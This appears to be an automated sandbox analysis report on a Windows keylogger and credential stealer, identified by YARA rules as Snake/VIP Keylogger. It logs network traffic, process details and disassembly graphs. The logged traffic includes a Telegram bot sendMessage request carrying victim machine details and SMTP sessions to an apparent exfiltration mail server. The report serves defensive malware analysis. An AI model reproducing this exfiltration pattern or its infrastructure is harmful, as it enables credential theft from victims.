                                                                              2024-10-09 12:45:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1249729188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:26 UTC676INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:26 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35807
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jap6XV2GsIg2vAhPRe3mI31jbJp2IoRMFTO%2BNBZ6bSeXLvICDjivBPjeH14edT2m%2FeO1Lk8PABu4vm1n7tVTiEoUyhAtvOeIshIxthyIpyfjXrEmIkosLzFmQa1FaBqQCJ%2BPIkvK"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77c028480f67-EWR
                                                                              2024-10-09 12:45:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.1249733188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:27 UTC702INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:27 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35808
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jLRHvBaMQ1QZYxsZdjXChvr37kTrvB3PjnSVS0l3fBG5fzHcRtsPMOOYJAh22iQkvbPN8M3TxNb1pHpfrAQiBS6qEQZ0GdoJYeCPhBVDmMA4LOG%2Ft204w5pxUdZhHK2mt1mZajE"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77c7dd67430a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-10-09 12:45:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.1249735149.154.167.2204437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:29 UTC344INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Wed, 09 Oct 2024 12:45:29 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-09 12:45:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Oct 9, 2024 14:45:36.786866903 CEST5874973646.151.208.21192.168.2.12220 host.ibtikarat.net ESMTP Exim 4.95 Wed, 09 Oct 2024 15:45:37 +0300
                                                                              Oct 9, 2024 14:45:36.787121058 CEST49736587192.168.2.1246.151.208.21EHLO 841618
                                                                              Oct 9, 2024 14:45:37.050111055 CEST5874973646.151.208.21192.168.2.12250-host.ibtikarat.net Hello 841618 [8.46.123.33]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Oct 9, 2024 14:45:37.050338984 CEST49736587192.168.2.1246.151.208.21STARTTLS
                                                                              Oct 9, 2024 14:45:37.352309942 CEST5874973646.151.208.21192.168.2.12220 TLS go ahead
                                                                              Oct 9, 2024 14:45:43.868622065 CEST5874973746.151.208.21192.168.2.12220 host.ibtikarat.net ESMTP Exim 4.95 Wed, 09 Oct 2024 15:45:44 +0300
                                                                              Oct 9, 2024 14:45:43.868843079 CEST49737587192.168.2.1246.151.208.21EHLO 841618
                                                                              Oct 9, 2024 14:45:44.140444994 CEST5874973746.151.208.21192.168.2.12250-host.ibtikarat.net Hello 841618 [8.46.123.33]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Oct 9, 2024 14:45:44.140820980 CEST49737587192.168.2.1246.151.208.21STARTTLS
                                                                              Oct 9, 2024 14:45:44.415576935 CEST5874973746.151.208.21192.168.2.12220 TLS go ahead

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:08:45:07
                                                                              Start date:09/10/2024
                                                                              Path:C:\Users\user\Desktop\7DI4iYwcvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'257'083 bytes
                                                                              MD5 hash:E142F0BF6C0D9BE52F8C7F52007C64D0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:08:45:13
                                                                              Start date:09/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
                                                                              Imagebase:0x470000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:16.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:60%
                                                                                Total number of Nodes:55
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 20336 fde018 20337 fde024 20336->20337 20348 61b295a 20337->20348 20355 61b2968 20337->20355 20338 fde0c3 20361 61bde00 20338->20361 20365 61bddf1 20338->20365 20369 61bddff 20338->20369 20339 fde0e6 20373 61bfc68 20339->20373 20377 61bfc5e 20339->20377 20340 fde61f 20349 61b2928 20348->20349 20350 61b2962 20348->20350 20351 61b2a56 20350->20351 20381 61b9548 20350->20381 20387 61b992c 20350->20387 20393 61b9328 20350->20393 20351->20338 20356 61b298a 20355->20356 20357 61b2a56 20356->20357 20358 61b9548 2 API calls 20356->20358 20359 61b9328 LdrInitializeThunk 20356->20359 20360 61b992c 2 API calls 20356->20360 20357->20338 20358->20357 20359->20357 20360->20357 20362 61bde22 20361->20362 20363 61b9548 2 API calls 20362->20363 20364 61bdeec 20362->20364 20363->20364 20364->20339 20366 61bde70 20365->20366 20367 61b9548 2 API calls 20366->20367 20368 61bdeec 20366->20368 20367->20368 20368->20339 20370 61bde22 20369->20370 20371 61b9548 2 API calls 20370->20371 20372 61bdeec 20370->20372 20371->20372 20372->20339 20374 61bfc6a 20373->20374 20375 61b9548 2 API calls 20374->20375 20376 61bfd3a 20374->20376 20375->20376 20376->20340 20378 61bfc68 20377->20378 20379 61b9548 2 API calls 20378->20379 20380 61bfd3a 20378->20380 20379->20380 20380->20340 20383 61b9579 20381->20383 20382 61b96d9 20382->20351 20383->20382 20384 61b9924 LdrInitializeThunk 20383->20384 20386 61b9328 LdrInitializeThunk 20383->20386 20384->20382 20386->20383 20388 61b97e3 20387->20388 20390 61b9924 LdrInitializeThunk 20388->20390 20392 61b9328 LdrInitializeThunk 20388->20392 20391 61b9a81 20390->20391 20391->20351 20392->20388 20394 61b933a 20393->20394 20396 61b933f 20393->20396 20394->20351 20395 61b9a69 LdrInitializeThunk 20395->20394 20396->20394 20396->20395 20397 61b9c70 20398 61b9c9d 20397->20398 20399 61b9328 LdrInitializeThunk 20398->20399 20400 61bbb7f 20398->20400 20402 61b9fa6 20398->20402 20399->20402 20401 61b9328 LdrInitializeThunk 20401->20402 20402->20400 20402->20401

                                                                                Executed Functions

                                                                                Function 061B5028 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N
                                                                                • API String ID: 0-1130791706
                                                                                • Opcode ID: be8df61d1601c7ad29a625f0832d783c1ce9dba8079048430c21b5fd1118a412
                                                                                • Instruction ID: 86bb489251525c0e3ad454deb7b882ab6eef12b724b836d5de422a29d3da3d1d
                                                                                • Opcode Fuzzy Hash: be8df61d1601c7ad29a625f0832d783c1ce9dba8079048430c21b5fd1118a412
                                                                                • Instruction Fuzzy Hash: B073F431D10B5A8EDB11EF68C844AD9F7B1FF99300F51D69AE44867261EB70AAC4CF81
                                                                                Function 061B9C70 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: K
                                                                                • API String ID: 0-856455061
                                                                                • Opcode ID: 745a2c45cb3abc32944efd22f3128f75db1646f9303be9ac87d86048ffd47f1a
                                                                                • Instruction ID: 44a4563d5a1842710f070f47c71902d33dbe40bb4971011926c75b60f9270305
                                                                                • Opcode Fuzzy Hash: 745a2c45cb3abc32944efd22f3128f75db1646f9303be9ac87d86048ffd47f1a
                                                                                • Instruction Fuzzy Hash: 9D33E130C146198ADB61EF68C884ADDF7B1FF99300F50D69AE45C67261EB70AAC5CF81
                                                                                Function 061B9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 974 61b9548-61b9577 975 61b9579 974->975 976 61b957e-61b9614 974->976 975->976 978 61b96b3-61b96b9 976->978 979 61b9619-61b962c 978->979 980 61b96bf-61b96d7 978->980 981 61b962e 979->981 982 61b9633-61b9684 979->982 983 61b96eb-61b96fe 980->983 984 61b96d9-61b96e6 980->984 981->982 1000 61b9697-61b96a9 982->1000 1001 61b9686-61b9694 982->1001 986 61b9700 983->986 987 61b9705-61b9721 983->987 985 61b9a81-61b9b7e 984->985 992 61b9b80-61b9b85 985->992 993 61b9b86-61b9b90 985->993 986->987 990 61b9728-61b974c 987->990 991 61b9723 987->991 997 61b974e 990->997 998 61b9753-61b9785 990->998 991->990 992->993 997->998 1006 61b978c-61b97ce 998->1006 1007 61b9787 998->1007 1003 61b96ab 1000->1003 1004 61b96b0 1000->1004 1001->980 1003->1004 1004->978 1009 61b97d0 1006->1009 1010 61b97d5-61b97de 1006->1010 1007->1006 1009->1010 1011 61b9a06-61b9a0c 1010->1011 1012 61b97e3-61b9808 1011->1012 1013 61b9a12-61b9a25 1011->1013 1014 61b980a 1012->1014 1015 61b980f-61b9846 1012->1015 1016 61b9a2c-61b9a47 1013->1016 1017 61b9a27 1013->1017 1014->1015 1025 61b9848 1015->1025 1026 61b984d-61b987f 1015->1026 1018 61b9a49 1016->1018 1019 61b9a4e-61b9a62 1016->1019 1017->1016 1018->1019 1023 61b9a69-61b9a7f LdrInitializeThunk 1019->1023 1024 61b9a64 1019->1024 1023->985 1024->1023 1025->1026 1028 61b98e3-61b98f6 1026->1028 1029 61b9881-61b98a6 1026->1029 1032 61b98f8 1028->1032 1033 61b98fd-61b9922 1028->1033 1030 61b98a8 1029->1030 1031 61b98ad-61b98db 1029->1031 1030->1031 1031->1028 1032->1033 1036 61b9931-61b9969 1033->1036 1037 61b9924-61b9925 1033->1037 1038 61b996b 1036->1038 1039 61b9970-61b99d1 call 61b9328 1036->1039 1037->1013 1038->1039 1045 61b99d8-61b99fc 1039->1045 1046 61b99d3 1039->1046 1049 61b99fe 1045->1049 1050 61b9a03 1045->1050 1046->1045 1049->1050 1050->1011
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc528d51304031b3b082c89d789c67caa4159c3b4fe16e8e2ade549faf114305
                                                                                • Instruction ID: 501c1280cf20b13d33f4ba3d3d791fdc5dbcc536ec5d524215837040ceb230d3
                                                                                • Opcode Fuzzy Hash: fc528d51304031b3b082c89d789c67caa4159c3b4fe16e8e2ade549faf114305
                                                                                • Instruction Fuzzy Hash: 82F1F474E00218CFDB54DFA9C884B9DFBB2BF89304F5485A9E848AB355DB349986CF50
                                                                                Function 061B9BFA Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: K
                                                                                • API String ID: 0-856455061
                                                                                • Opcode ID: 57605626815ee02f5d5b6fe76af7f7a29c4abb9745380897b83f3fd782e745c6
                                                                                • Instruction ID: a6ca8e685f77eccaa861680733f2b1bbfac573b9f167d22765213247b9a680a0
                                                                                • Opcode Fuzzy Hash: 57605626815ee02f5d5b6fe76af7f7a29c4abb9745380897b83f3fd782e745c6
                                                                                • Instruction Fuzzy Hash: 73C13670D046188FDB55DF69C8847DDBBF1EF89300F14D6AAE048AB261EB74AA85CF50
                                                                                Function 00FDA088 Relevance: .9, Instructions: 907COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9e8423dff494798824a3aef6b04479a3c0ae19ce521be775200432fa30fd229
                                                                                • Instruction ID: cf6fe6eecc85958f30c5057e49bbdd74df61fbf0a28375ad652d223babe79f7d
                                                                                • Opcode Fuzzy Hash: d9e8423dff494798824a3aef6b04479a3c0ae19ce521be775200432fa30fd229
                                                                                • Instruction Fuzzy Hash: 28827D31A00209DFCB15CFA8C984AAEBBF2FF88310F19865AE4059B361D735ED51DB56
                                                                                Function 061B0B30 Relevance: .7, Instructions: 709COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2016 61b0b30-61b0b50 2017 61b0b52 2016->2017 2018 61b0b57-61b0bd9 2016->2018 2017->2018 2020 61b0c3e-61b0c54 2018->2020 2021 61b0bdb-61b0be4 2020->2021 2022 61b0c56-61b0ca0 2020->2022 2023 61b0beb-61b0c34 2021->2023 2024 61b0be6 2021->2024 2029 61b0d0b-61b0d0c 2022->2029 2030 61b0ca2-61b0ce3 2022->2030 2031 61b0c3b 2023->2031 2032 61b0c36 2023->2032 2024->2023 2033 61b0d0d-61b0d3e 2029->2033 2038 61b0d05-61b0d06 2030->2038 2039 61b0ce5-61b0d03 2030->2039 2031->2020 2032->2031 2037 61b0d45-61b0dac 2033->2037 2045 61b16fe-61b1733 2037->2045 2046 61b0db2-61b0dd3 2037->2046 2040 61b0d07-61b0d09 2038->2040 2039->2040 2040->2033 2049 61b16db-61b16f7 2046->2049 2050 61b0dd8-61b0de1 2049->2050 2051 61b16fd 2049->2051 2052 61b0de8-61b0e4e 2050->2052 2053 61b0de3 2050->2053 2051->2045 2057 61b0e50 2052->2057 2058 61b0e55-61b0edf 2052->2058 2053->2052 2057->2058 2064 61b0ef1-61b0ef8 2058->2064 2065 61b0ee1-61b0ee8 2058->2065 2066 61b0efa 2064->2066 2067 61b0eff-61b0f0c 2064->2067 2068 61b0eea 2065->2068 2069 61b0eef 2065->2069 2066->2067 2070 61b0f0e 2067->2070 2071 61b0f13-61b0f1a 2067->2071 2068->2069 2069->2067 2070->2071 2072 61b0f1c 2071->2072 2073 61b0f21-61b0f78 2071->2073 2072->2073 2076 61b0f7a 2073->2076 2077 61b0f7f-61b0f96 2073->2077 2076->2077 2078 61b0f98-61b0f9f 2077->2078 2079 61b0fa1-61b0fa9 2077->2079 2080 61b0faa-61b0fb4 2078->2080 2079->2080 2081 61b0fbb-61b0fc4 2080->2081 2082 61b0fb6 2080->2082 2083 61b16ab-61b16b1 2081->2083 2082->2081 2084 61b0fc9-61b0fd5 2083->2084 2085 61b16b7-61b16d1 2083->2085 2086 61b0fdc-61b0fe1 2084->2086 2087 61b0fd7 2084->2087 2092 61b16d8 2085->2092 2093 61b16d3 2085->2093 2089 61b0fe3-61b0fef 2086->2089 2090 61b1024-61b1026 2086->2090 2087->2086 2094 61b0ff1 2089->2094 2095 61b0ff6-61b0ffb 2089->2095 2091 61b102c-61b1040 2090->2091 2096 61b1689-61b1696 2091->2096 2097 61b1046-61b105b 2091->2097 2092->2049 2093->2092 2094->2095 2095->2090 2098 61b0ffd-61b100a 2095->2098 2103 61b1697-61b16a1 2096->2103 2101 61b105d 2097->2101 2102 61b1062-61b10e8 2097->2102 2099 61b100c 2098->2099 2100 61b1011-61b1022 2098->2100 2099->2100 2100->2091 2101->2102 2110 61b10ea-61b1110 2102->2110 2111 61b1112 2102->2111 2104 61b16a8 2103->2104 2105 61b16a3 2103->2105 2104->2083 2105->2104 2112 61b111c-61b113c 2110->2112 2111->2112 2114 61b12bb-61b12c0 2112->2114 2115 61b1142-61b114c 2112->2115 2118 61b12c2-61b12e2 2114->2118 2119 61b1324-61b1326 2114->2119 2116 61b114e 2115->2116 2117 61b1153-61b117c 2115->2117 2116->2117 2121 61b117e-61b1188 2117->2121 2122 61b1196-61b1198 2117->2122 2132 61b130c 2118->2132 2133 61b12e4-61b130a 2118->2133 2120 61b132c-61b134c 2119->2120 2123 61b1683-61b1684 2120->2123 2124 61b1352-61b135c 2120->2124 2126 61b118a 2121->2126 2127 61b118f-61b1195 2121->2127 2128 61b1237-61b1246 2122->2128 2131 61b1685-61b1687 2123->2131 2129 61b135e 2124->2129 2130 61b1363-61b138c 2124->2130 2126->2127 2127->2122 2134 61b1248 2128->2134 2135 61b124d-61b1252 2128->2135 2129->2130 2138 61b138e-61b1398 2130->2138 2139 61b13a6-61b13b4 2130->2139 2131->2103 2140 61b1316-61b1322 2132->2140 2133->2140 2134->2135 2136 61b127c-61b127e 2135->2136 2137 61b1254-61b1264 2135->2137 2143 61b1284-61b1298 2136->2143 2141 61b126b-61b127a 2137->2141 2142 61b1266 2137->2142 2144 61b139a 2138->2144 2145 61b139f-61b13a5 2138->2145 2146 61b1453-61b1462 2139->2146 2140->2120 2141->2143 2142->2141 2148 61b129e-61b12b6 2143->2148 2149 61b119d-61b11b8 2143->2149 2144->2145 2145->2139 2150 61b1469-61b146e 2146->2150 2151 61b1464 2146->2151 2148->2131 2152 61b11ba 2149->2152 2153 61b11bf-61b1229 2149->2153 2154 61b1498-61b149a 2150->2154 2155 61b1470-61b1480 2150->2155 2151->2150 2152->2153 2172 61b122b 2153->2172 2173 61b1230-61b1236 2153->2173 2156 61b14a0-61b14b4 2154->2156 2157 61b1482 2155->2157 2158 61b1487-61b1496 2155->2158 2159 61b14ba-61b1523 2156->2159 2160 61b13b9-61b13d4 2156->2160 2157->2158 2158->2156 2170 61b152c-61b167f 2159->2170 2171 61b1525-61b1527 2159->2171 2162 61b13db-61b1445 2160->2162 2163 61b13d6 2160->2163 2177 61b144c-61b1452 2162->2177 2178 61b1447 2162->2178 2163->2162 2174 61b1680-61b1681 2170->2174 2171->2174 2172->2173 2173->2128 2174->2085 2177->2146 2178->2177
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d406cb2efabddff54f1614c8ec5e270b0946c76e19eb5064713635c9e8dea07c
                                                                                • Instruction ID: 94d555a12e32fa131607745d61a0c0fffea26427b3853e2a5362b5015c8d8f97
                                                                                • Opcode Fuzzy Hash: d406cb2efabddff54f1614c8ec5e270b0946c76e19eb5064713635c9e8dea07c
                                                                                • Instruction Fuzzy Hash: A872CE74E012288FEB64DF69C890BEDBBB2BB49304F1495E9D409A7355EB349E81CF50
